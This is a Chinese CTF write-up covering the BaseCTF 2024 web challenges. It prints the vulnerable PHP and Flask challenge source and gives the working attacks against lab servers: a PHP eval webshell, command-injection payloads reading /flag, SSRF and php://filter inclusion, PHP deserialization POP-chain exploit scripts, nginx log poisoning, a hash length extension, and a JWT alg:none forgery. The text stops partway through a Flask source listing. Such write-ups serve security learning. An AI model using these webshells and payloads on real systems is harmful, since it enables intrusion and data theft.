2024BaseCTF-Web部分题解


A Dark Room

直接查看源代码,注释里有flag

HTTP是什么呀

bp抓包改http参数

POST /?basectf=we1c%2500me  HTTP/1.1
Host: challenge.basectf.fun:33834
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
X-Forwarded-For:127.0.0.1
Referer:Base
User-Agent:Base
Cookie:c00k13=i can't eat it
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 9

Base=fl@g

会得到以下内容,base64解码即可

HTTP/1.1 302 Found
Server: nginx/1.18.0
Date: Thu, 15 Aug 2024 07:05:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.4.27
Location: success.php?flag=QmFzZUNURns1N2Y2MGNlYi00Y2UxLTQ5Y2UtYjNhMC0xMTc3NTliODhkNmZ9Cg==
Content-Length: 0

客户端重定向

  • 服务器在响应中返回一个带有302状态码的响应头,指示浏览器进行跳转。
  • 例如,服务器端脚本通过header("Location: success.php?flag=QmFzZUNURns1N2Y2MGNlYi00Y2UxLTQ5Y2UtYjNhMC0xMTc3NTliODhkNmZ9Cg==");指令将HTTP响应状态设置为302,然后浏览器会自动访问success.php?flag=QmFzZUNURns1N2Y2MGNlYi00Y2UxLTQ5Y2UtYjNhMC0xMTc3NTliODhkNmZ9Cg==页面。

喵喵喵

<?php
// The page prints its own source, so the visitor sees exactly what runs.
highlight_file(__FILE__);
error_reporting(0);

// A raw GET parameter is handed to eval(): arbitrary PHP execution for anyone
// who can send a request. Intentional for the challenge; the only real fix is
// to not eval() request data at all — filtering the string does not make it safe.
$a = $_GET['DT'];

eval($a);

?>

get传参给eval执行,直接传system('cat /flag');,即url?DT=system('cat /flag');

EncirclingGame

A simple game, enjoy it and get the flag when you complete it.

纯游戏题,通关得到flag

upload

文件上传漏洞,没有检测文件类型,直接传个木马,然后蚁剑连接

test.php

<?php @eval($_POST['pass']);?>

Aura酱的礼物

考点:data 伪协议、SSRF、文件包含

<?php
  highlight_file(__FILE__);
// Aura, welcome home~
// There is a gift here, please sign for it~
// file_get_contents() on a request value accepts any stream wrapper, so the
// 'Aura' comparison can be met with an inline data: payload instead of a real
// file. Compare against a fixed server-side path, never a client-supplied one.
$pen = $_POST['pen'];
if (file_get_contents($pen) !== 'Aura')
{
  die('这是 Aura 的礼物,你不是 Aura!');
}

// Gift received! Next, go write your thoughts on the blog~
// strpos(...) !== 0 is a prefix check, not a host check: any URL that merely
// starts with the blog address (e.g. with an '@' userinfo part ahead of a
// different host) passes, and file_get_contents() then fetches an
// attacker-chosen URL from the server (SSRF). Validate parse_url()['host']
// against an allowlist instead of comparing string prefixes.
$challenge = $_POST['challenge'];
if (strpos($challenge, 'http://jasmineaura.github.io') !== 0)
{
  die('这不是 Aura 的博客!');
}

$blog_content = file_get_contents($challenge);
if (strpos($blog_content, '已经收到Kengwang的礼物啦') === false)
{
  die('请去博客里面写下感想哦~');
}

// Hehe, time to unwrap the gift. Psst: the gift is inside flag.php~
// include() of a request value is arbitrary file inclusion; a php://filter
// wrapper turns it into source disclosure (the file is base64-encoded instead
// of executed). Include only from a fixed allowlist of files.
$gift = $_POST['gift'];
include($gift); 

post参数:pen=data://text/plain,Aura&challenge=http://jasmineaura.github.io@challenge.basectf.fun:21758/&gift=php://filter/convert.base64-encode/resource=flag.php

一起吃豆豆

index.js里有一行context.fillText(_LIFE ? atob("QmFzZUNURntKNV9nYW0zXzFzX2Vhc3lfdDBfaDRjayEhfQ==") : 'GAME OVER', this.x, this.y);,base64解码得到flag

你听不到我的声音

系统命令执行,不会直接显示,所以放到其他文件里再访问文件:cmd=cat /flag > ./1.txt

// A POST value is passed verbatim to the shell: command injection by design.
// The command's output is not echoed (only its side effects are observable).
// Mitigation: no shell at all, or a fixed allowlist of commands with
// escapeshellarg() on every argument.
shell_exec($_POST['cmd']);

easy_ser

源码

<?php
// The challenge shows its own source; error_reporting(0) hides the notices
// the deserialization chain below would otherwise emit.
highlight_file(__FILE__);
error_reporting(0);
// Gadget: converting a `re` to string dereferences a property of $chu0 whose
// name comes from an undefined variable (so it is empty). On an object that
// defines __get() (see pwn) that lookup fires __get(). With $chu0 unset the
// method short-circuits and returns a plain string.
class re{
    public $chu0;
    public function __toString(){
        if(!isset($this->chu0)){
            return "I can not believes!";
        }
        // $nononono is never assigned, so this reads property "" of $chu0.
        $this->chu0->$nononono;
    }
}

// Entry point of the chain. unserialize() invokes __wakeup(), and the string
// concatenation with $kw calls $kw's __toString() when $kw is an object
// (see re). __destruct() only prints.
class web {
    public $kw;
    public $dt;

    public function __wakeup() {
        echo "lalalla".$this->kw;
    }

    public function __destruct() {
        echo "ALL Done!";
    }
}

// Reached via re::__toString(). The $dusk comparison only prints a message
// and never returns, so getflag() is invoked on $over regardless of its value.
class pwn {
    public $dusk;
    public $over;

    public function __get($name) {
        if($this->dusk != "gods"){
            echo "什么,你竟敢不认可?";
        }
        $this->over->getflag();
    }
}

// Sink: a fixed string is eval()'d and shells out to read the flag. It is
// reachable by pointing pwn::$over at a Misc instance.
class Misc {
    public $nothing;
    public $flag;

    public function getflag() {
        eval("system('cat /flag');");
    }
}

// Alternative target with a harmless getflag(); choosing it as pwn::$over
// ends the chain without reaching the sink.
class Crypto {
    public function __wakeup() {
        echo "happy happy happy!";
    }

    public function getflag() {
        echo "you are over!";
    }
}
// Root cause: unserialize() of request data lets the client choose which of
// the classes above are instantiated, and their magic methods (__wakeup,
// __toString, __get, __destruct) then run server-side. Use json_decode() for
// untrusted input, or at least unserialize($ser, ['allowed_classes' => false]).
$ser = $_GET['ser'];
unserialize($ser);
?>

exp

<?php

// Mirror of the target's `re` class. Only the class name and property names
// matter for serialize(); the method body is kept so the local copy stays
// identical to the target.
class re{
    public $chu0;
    public function __toString(){
        if(!isset($this->chu0)){
            return "I can not believes!";
        }
        $this->chu0->$nononono;
    }
}

// Mirror of the target's `web` class; $kw is where the next gadget is placed,
// $dt is left null.
class web {
    public $kw;
    public $dt;

    public function __wakeup() {
        echo "lalalla".$this->kw;
    }

    public function __destruct() {
        echo "ALL Done!";
    }
}

// Mirror of the target's `pwn` class; $over receives the object whose
// getflag() the target will call.
class pwn {
    public $dusk;
    public $over;

    public function __get($name) {
        if($this->dusk != "gods"){
            echo "什么,你竟敢不认可?";
        }
        $this->over->getflag();
    }
}

// Mirror of the target's `Misc`. The body of getflag() is replaced by a
// harmless echo: serialize() only records class and property names, and this
// keeps a local run of the script from executing the target's command.
class Misc {
    public $nothing;
    public $flag;

    public function getflag() {
        echo "getflag";
    }
}

// Wire the objects in the order the target's magic methods fire on
// unserialize(): web::__wakeup -> re::__toString -> pwn::__get -> Misc::getflag.
// $dusk = "gods" only suppresses pwn's message; the call happens either way.
$re = new re();
$pwn = new pwn();
$web = new web();
$misc = new Misc();

$pwn->dusk = "gods";
$pwn->over = $misc;

$re->chu0 = $pwn;
$web->kw = $re;

// All properties are public, so the output contains no \0-prefixed names.
$res = serialize($web);
echo $res;

最终构造:O:3:"web":2:{s:2:"kw";O:2:"re":1:{s:4:"chu0";O:3:"pwn":2:{s:4:"dusk";s:4:"gods";s:4:"over";O:4:"Misc":2:{s:7:"nothing";N;s:4:"flag";N;}}}s:2:"dt";N;}

RCEisamazingwithspace

绕过空格:cmd=cat${IFS}/flag

Really EZ POP

源码

<?php
// Shows this file's source to the visitor.
  highlight_file(__FILE__);

// Sink: any string conversion of a Sink eval()s its private $cmd. The
// property is private, but unserialize() restores private properties just as
// readily as public ones, so "private" is no protection here.
class Sink
{
  private $cmd = 'echo 123;';
  public function __toString()
  {
    eval($this->cmd);
  }
}

// Gadget: calling a Shark as a function concatenates $word into a string,
// which invokes $word's __toString() when $word is an object (see Sink).
class Shark
{
  private $word = 'Hello, World!';
  public function __invoke()
  {
    echo 'Shark says:' . $this->word;
  }
}

// Gadget: reading any undefined property on a Sea runs __get(), which calls
// $animal as a function — i.e. its __invoke() when $animal is an object (see Shark).
class Sea
{
  public $animal;
  public function __get($name)
  {
    $sea_ani = $this->animal;
    echo 'In a deep deep sea, there is a ' . $sea_ani();
  }
}

// Entry point: when the unserialized Nature is destroyed at script end, it
// reads $sea->see. Sea declares no `see` property, so this lands in Sea::__get().
class Nature
{
  public $sea;

  public function __destruct()
  {
    echo $this->sea->see;
  }
}

// Root cause: unserialize() of request data. The client chooses the object
// graph, and the magic methods above run server-side. Prefer json_decode()
// for untrusted input, or unserialize($s, ['allowed_classes' => false]).
if ($_POST['nature']) {
  $nature = unserialize($_POST['nature']);
}

exp

<?php
// Mirror of the target's Sink. setPrivateVar() exists only so this script can
// assign the private $cmd before serialize(). Private properties serialize
// under the name "\0Sink\0cmd", which is why the payload carries %00 bytes.
class Sink
{
    private $cmd = 'echo 123;';
    public function setPrivateVar($res) {
        $this->cmd = $res;
    }

    public function __toString()
    {
        eval($this->cmd);
    }
}

// Mirror of the target's Shark, with a setter for the private $word so it can
// hold a Sink object (serialized as "\0Shark\0word").
class Shark
{
    private $word = 'Hello, World!';
    public function setPrivateVar($res) {
        $this->word = $res;
    }
    public function __invoke()
    {
        echo 'Shark says:' . $this->word;
    }
}

// Mirror of the target's Sea; $animal is public, no setter needed.
class Sea
{
    public $animal;
    public function __get($name)
    {
        $sea_ani = $this->animal;
        echo 'In a deep deep sea, there is a ' . $sea_ani();
    }
}

// Mirror of the target's Nature, the outermost object of the chain.
class Nature
{
    public $sea;

    public function __destruct()
    {
        echo $this->sea->see;
    }
}

// Assemble the chain in the order the target's magic methods fire:
// Nature::__destruct -> Sea::__get -> Shark::__invoke -> Sink::__toString -> eval.
$Sink = new Sink();
$Nature = new Nature();
$Sea = new Sea();
$Shark = new Shark();

$Sink->setPrivateVar("system('cat /flag');");
$Nature->sea = $Sea;
$Sea->animal = $Shark;
$Shark->setPrivateVar($Sink);

// Note: running this script locally also triggers Nature::__destruct() (and
// therefore the eval) when it exits, because $Nature goes out of scope.
$res = serialize($Nature);
echo $res;

发过去的序列化内容里,private 属性的名称前后要带 \x00(即 \x00类名\x00属性名,URL 编码为 %00),最终发送nature=O:6:"Nature":1:{s:3:"sea";O:3:"Sea":1:{s:6:"animal";O:5:"Shark":1:{s:11:"%00Shark%00word";O:4:"Sink":1:{s:9:"%00Sink%00cmd";s:20:"system('cat /flag');";}}}}

关于非公有字段名称:

  • private 使用: 私有的类的名称 (考虑到继承的情况) 和字段名组合 \x00类名称\x00字段名
  • protected 使用: * 和字段名组合 \x00*\x00字段名

数学大师

用正则从网页中提取算式并计算,再以 answer 参数 POST 回去,需要保持 session cookie(全程使用同一个会话)

import requests
import re

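def extract_and_calculate(expression):
    """Find the first ``<int> <op> <int>`` in ``expression`` and compute it.

    ``expression`` is the raw HTML returned by the challenge server, i.e.
    content controlled by a remote party, so it is never passed to ``eval``;
    the operator is looked up in a fixed table instead. ``÷`` and ``×`` are
    normalised to ``/`` and ``*`` first.

    Returns the numeric result (``int``, or ``float`` for ``/``) on success.
    Returns an explanatory string when no expression is found, when the
    operator run is not one of ``+ - * /``, or when evaluation fails (e.g.
    division by zero) — the same string-on-error contract as before.
    """
    pattern = r'(\d+)\s*([+\-*/÷×]+)\s*(\d+)'
    match = re.search(pattern, expression)
    if not match:
        return "No valid expression found."

    num1, operator, num2 = match.groups()
    operator = operator.replace('÷', '/').replace('×', '*')

    # Fixed dispatch table instead of eval(); operator runs such as '+-' or
    # '**' are rejected rather than interpreted as Python syntax.
    operations = {
        '+': lambda a, b: a + b,
        '-': lambda a, b: a - b,
        '*': lambda a, b: a * b,
        '/': lambda a, b: a / b,
    }

    try:
        return operations[operator](int(num1), int(num2))
    except KeyError:
        return f"Error in calculation: unsupported operator '{operator}'"
    except Exception as e:
        return f"Error in calculation: {str(e)}"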

# Drive the challenge: fetch the page, solve the arithmetic it shows, post the
# answer back on the same session, and repeat. A Session object keeps the
# server's session cookie between requests.
session = requests.Session()

url = 'http://challenge.basectf.fun:29707'
response = session.get(url).text

for _ in range(50):
    answer = int(extract_and_calculate(response))
    response = session.post(url, data={'answer': answer}).text
    print(response)

所以你说你懂md5?

利用hash-ext-attack工具进行哈希长度扩展

python3 hash_ext_attack.py
2024-09-10 20:53:46.493 | DEBUG    | common.md5_manual:__init__:17 - init......
请输入已知明文:
请输入已知hash: 82cb3db8069266aecdc0d3cdabb4b460 
请输入扩展字符: admin
请输入密钥长度:96
2024-09-10 20:53:52.093 | INFO     | common.HashExtAttack:run:65 - 已知明文:b''
2024-09-10 20:53:52.093 | INFO     | common.HashExtAttack:run:66 - 已知hashb'82cb3db8069266aecdc0d3cdabb4b460'
2024-09-10 20:53:52.093 | INFO     | common.HashExtAttack:run:68 - 新明文:b'\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00admin'
2024-09-10 20:53:52.093 | INFO     | common.HashExtAttack:run:69 - 新明文(url编码)%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%03%00%00%00%00%00%00admin
2024-09-10 20:53:52.093 | INFO     | common.HashExtAttack:run:71 -hash:e7e7b8375abc6096501a68bbd0e3f662

发送http内容

POST / HTTP/1.1
Host: challenge.basectf.fun:49521
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Cookie:PHPSESSID=1gtcjs8kgqmltafgpn6cncugfv
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 522

apple[]=24&banana[]=2&appple=240610708&bananana=QNKCDZO&banananana=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2&apppple=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&name=%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%03%00%00%00%00%00%00admin&md5=e7e7b8375abc6096501a68bbd0e3f662

flag直接读取不就行了?

php原生类的利用

<?php
  highlight_file('index.php');
# I hid the flag in a secret folder, so learn how to traverse it~
# Class name and constructor argument both come from the request, so any
# loaded class can be instantiated, then iterated (first form) or converted to
# a string (second form). PHP's built-in SPL classes alone are enough to list
# directories and read files, as the writeup shows. Instantiating a
# client-named class requires an allowlist of permitted class names.
error_reporting(0);
$J1ng = $_POST['J'];
$Hong = $_POST['H'];
$Keng = $_GET['K'];
$Wang = $_GET['W'];
$dir = new $Keng($Wang);
foreach($dir as $f) {
  echo($f . '<br>');
}
echo new $J1ng($Hong);
?>

访问http://challenge.basectf.fun:27459/?K=DirectoryIterator&W=/,发现根目录下有secret,访问http://challenge.basectf.fun:27459/?K=DirectoryIterator&W=/secret发现f11444g.php,发送post请求

J=SplFileObject&H=/secret/f11444g.php

网页看不到,直接查看源代码

</code>.<br>..<br>f11444g.php<br><?php BaseCTF{640a9b0d-3b98-4d44-8164-a1113b9ec49f} ?>

滤个不停

文件

<?php
  highlight_file(__FILE__);
error_reporting(0);

$incompetent = $_POST['incompetent'];
$Datch = $_POST['Datch'];

// Strict comparison: the greeting must match exactly.
if ($incompetent !== 'HelloWorld') {
  die('写出程序员的第一行问候吧!');
}

//What on earth is this???
// Each of these characters must appear somewhere in the filename. This only
// shapes which paths qualify; it is not a security control.
$required_chars = ['s', 'e', 'v', 'a', 'n', 'x', 'r', 'o'];
$is_valid = true;

foreach ($required_chars as $char) {
  if (strpos($Datch, $char) === false) {
    $is_valid = false;
    break;
  }
}

if ($is_valid) {

  // Denylist of stream-wrapper schemes. A plain filesystem path contains no
  // "://" and is not caught, so any file the PHP process can read — including
  // web-server logs whose contents a client partly controls through request
  // headers — can still be included and executed. The real fix is an
  // allowlist of the specific files this page is meant to include.
  $invalid_patterns = ['php://', 'http://', 'https://', 'ftp://', 'file://' , 'data://', 'gopher://'];

  foreach ($invalid_patterns as $pattern) {
    if (stripos($Datch, $pattern) !== false) {
      die('此路不通换条路试试?');
    }
  }


  include($Datch);
} else {
  die('文件名不合规 请重试');
}
?>

payload:incompetent=HelloWorld&Datch=/var/log/nginx/access.log,user agent中添加<?php @eval($_POST['pass']);?>

访问/var/log/nginx/access.log发送incompetent=HelloWorld&Datch=/var/log/nginx/access.log&pass=system('cat /flag');

得到

10.32.0.0 - - [13/Sep/2024:00:20:54 +0800] "GET / HTTP/1.1" 502 559 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:20:55 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:20:58 +0800] "GET / HTTP/1.1" 200 5472 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:20:58 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:21:02 +0800] "GET /%3C?php%20phpinfo();?%3E HTTP/1.1" 200 5478 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:21:02 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/%3C?php%20phpinfo();?%3E" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:24:36 +0800] "GET / HTTP/1.1" 200 5472 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:24:37 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:26:13 +0800] "GET / HTTP/1.1" 200 5472 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27" "-" 10.32.0.0 - - [13/Sep/2024:00:27:12 
+0800] "POST / HTTP/1.1" 200 7391 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:13 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:26 +0800] "POST / HTTP/1.1" 200 5467 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:27 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:30 +0800] "POST / HTTP/1.1" 200 8321 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:31 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:28:08 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)" "-" 10.32.0.0 - - [13/Sep/2024:00:28:32 +0800] "POST / HTTP/1.1" 200 8935 "http://challenge.basectf.fun:30015/" "BaseCTF{a0fd8763-8a3b-4bc5-b430-f09a213482e3} " "-" 10.32.0.0 - - [13/Sep/2024:00:28:33 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:30:27 +0800] "POST / HTTP/1.1" 200 9332 
"http://challenge.basectf.fun:30015/" "BaseCTF{a0fd8763-8a3b-4bc5-b430-f09a213482e3} " "-" 10.32.0.0 - - [13/Sep/2024:00:30:28 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:30:43 +0800] "GET / HTTP/1.1" 200 5478 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)" "-" 10.32.0.0 - - [13/Sep/2024:00:30:46 +0800] "\x16\x03\x01\x00\xD2\x01\x00\x00\xCE\x03\x03\xC25 \xAE\x14'\xE9\x9C\x84\xF1\xB3\xDD\xE3\x09h\x98.\x10\x86\x16\xECn4\x10\xE7\xB3!r\xBA\x1BB\xA2\x00\x00b\xC00\xC0,\xC0/\xC0+\x00\x9F\x00\x9E\xC02\xC0.\xC01\xC0-\x00\xA5\x00\xA1\x00\xA4\x00\xA0\xC0(\xC0$\xC0\x14\xC0" 400 157 "-" "-" "-"

no jwt

源码

from flask import Flask, request, jsonify
import jwt
import datetime
import os
import random
import string

app = Flask(__name__)

# Randomly generated secret_key; it doubles as the HS256 signing key in login().
# random.choices() is not a CSPRNG — use secrets.token_hex()/secrets.choice()
# for anything that signs or authenticates.
app.secret_key = ''.join(random.choices(string.ascii_letters + string.digits, k=16))

# 登录接口
@app.route('/login', methods=['POST'])
def login():
    """Issue a one-hour HS256 token with ``role: user`` for the posted username.

    ``password`` is read but never checked, so any username obtains a token.
    ``request.json`` is ``None`` when the body is not JSON, in which case
    ``data.get`` raises — presumably surfaced as a 500 by Flask; confirm.
    """
    data = request.json
    username = data.get('username')
    password = data.get('password')

    # Every user is given the 'user' role.
    token = jwt.encode({
        'sub': username,
        'role': 'user',  # ordinary-user role
        # datetime.utcnow() is deprecated since Python 3.12; prefer
        # datetime.now(datetime.timezone.utc).
        'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=1)
    }, app.secret_key, algorithm='HS256')
    return jsonify({'token': token}), 200

# flag 接口
@app.route('/flag', methods=['GET'])
def flag():
    """Return the flag when the bearer token's ``role`` claim is ``admin``.

    The token is decoded with ``verify_signature`` and ``verify_exp`` both
    off, so the signature produced by ``login`` is never checked and the
    ``role`` claim is whatever the client wrote. The fix is
    ``jwt.decode(token, app.secret_key, algorithms=['HS256'])`` — pinning
    ``algorithms`` also rejects ``alg: none`` tokens.
    """
    token = request.headers.get('Authorization')

    if token:
        try:
            # Assumes the "Bearer <token>" form; a header without a space
            # raises IndexError, which none of the handlers below catch.
            decoded = jwt.decode(token.split(" ")[1], options={"verify_signature": False, "verify_exp": False})
            # Check whether the user's role is admin.
            if decoded.get('role') == 'admin':
                with open('/flag', 'r') as f:
                    flag_content = f.read()
                return jsonify({'flag': flag_content}), 200
            else:
                return jsonify({'message': 'Access denied: admin only'}), 403

        except FileNotFoundError:
            return jsonify({'message': 'Flag file not found'}), 404
        # Effectively unreachable while verify_exp is disabled above.
        except jwt.ExpiredSignatureError:
            return jsonify({'message': 'Token has expired'}), 401
        except jwt.InvalidTokenError:
            return jsonify({'message': 'Invalid token'}), 401
    return jsonify({'message': 'Token is missing'}), 401

# debug=True enables the Werkzeug interactive debugger and reloader; it must
# never be on for an exposed deployment, since the debugger executes code.
if __name__ == '__main__':
    app.run(debug=True)

先向 /login POST 数据拿到 token,确认 JWT 的格式后,把 role 改成 admin

生成jwt token

import jwt  # 导入 PyJWT 包

# payload
# Payload: the claims the /flag handler reads; only 'role' is actually checked.
token_dict = {
  "sub": "admin",  # subject claim; its value is not checked server-side
  "role": "admin",
}

# Header declaring no signature algorithm. A verifier that skips signature
# checking, or does not pin an algorithms list, accepts such a token; a
# correctly configured one rejects it.
headers = {
  "alg": "none",
  "typ": "JWT"
}

# PyJWT's encode with algorithm="none" yields "<header>.<payload>." with an
# empty signature segment.
jwt_token = jwt.encode(token_dict, "", algorithm="none", headers=headers)

print(jwt_token)

Bearer方案发送认证数据

import requests

# Token produced by the previous script (alg "none", role admin).
jwt_token = 'eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.'

# Target endpoint.
url = 'http://challenge.basectf.fun:27209/flag'

# GET /flag with the token carried in a Bearer Authorization header.
auth_headers = {'Authorization': f'Bearer {jwt_token}'}
response = requests.get(url, headers=auth_headers)

# Report the outcome; anything other than 200 is treated as a failure.
if response.status_code != 200:
    print('Error:', response.status_code, response.text)
else:
    print('Success:', response.json())

back to the future

用 githacker 拉取 git 源码,然后直接 git show 查看历史提交

圣钥之战

提示可以去 read 那里找一下 flag,访问 /read 拿到源码

from flask import Flask,request
import json

# Application object. Like __file__ and `instance` below, it lives in this
# module's globals.
app = Flask(__name__)

def merge(src, dst):
    """Recursively copy the dict ``src`` into ``dst``.

    A subscriptable ``dst`` is treated as a mapping and updated by key;
    anything else is written with ``setattr``, recursing into an existing
    attribute when the incoming value is itself a dict. No key is excluded,
    so a ``src`` naming dunder attributes (``__init__``, ``__globals__``)
    walks from a plain instance into its module's globals and overwrites
    them — the "Python prototype pollution" primitive this challenge is
    built around. A safe merge refuses keys beginning with ``__`` and only
    writes into plain dicts.
    """
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            # Mapping-like target. dst.get(k) tests truthiness, so a falsy
            # existing value is replaced rather than merged into.
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            # Object target with a matching attribute: descend into it.
            merge(v, getattr(dst, k))
        else:
            # Object target: create or overwrite the attribute outright.
            setattr(dst, k, v)

def is_json(data):
    """Return True when ``data`` parses as JSON, False on a JSON syntax error.

    Only ``ValueError`` (the base of ``json.JSONDecodeError``) is caught; a
    non-string argument still raises ``TypeError``. Defined but not used by
    the routes in this file.
    """
    try:
        json.loads(data)
    except ValueError:
        return False
    return True

class cls:
    """Empty placeholder; its single instance is the object ``/pollute`` merges into."""

    def __init__(self):
        pass

# Shared, module-level target that /pollute merges request JSON into; every
# request mutates this same object.
instance = cls()

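@app.route('/', methods=['GET', 'POST'])
def hello_world():
    """Serve the static landing page.

    Returns the contents of ``/static/index.html`` as the response body.
    The file handle is closed deterministically via ``with``; the original
    left it to the garbage collector.
    """
    with open('/static/index.html', encoding="utf-8") as page:
        return page.read()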

@app.route('/read', methods=['GET', 'POST'])
def Read():
    """Return this module's own source, read from the path in ``__file__``.

    ``__file__`` is a module global; anything able to rewrite module globals
    (see ``merge`` and ``/pollute``) changes which file this handler reads.
    The handle from open() is never closed explicitly.
    """
    # NOTE(review): a single-quoted f-string cannot span lines as printed
    # below; the original is presumably a triple-quoted f-string whose quotes
    # were lost when the page was rendered — confirm against the source.
    file = open(__file__, encoding="utf-8").read()
    return f"J1ngHong说:你想read flag吗?
那么圣钥之光必将阻止你!
但是小小的源码没事,因为你也读不到flag()
{file}
"

@app.route('/pollute', methods=['GET', 'POST'])
def Pollution():
    """Merge a JSON request body into the module-level ``instance``.

    ``request.is_json`` only checks the Content-Type header; the body is then
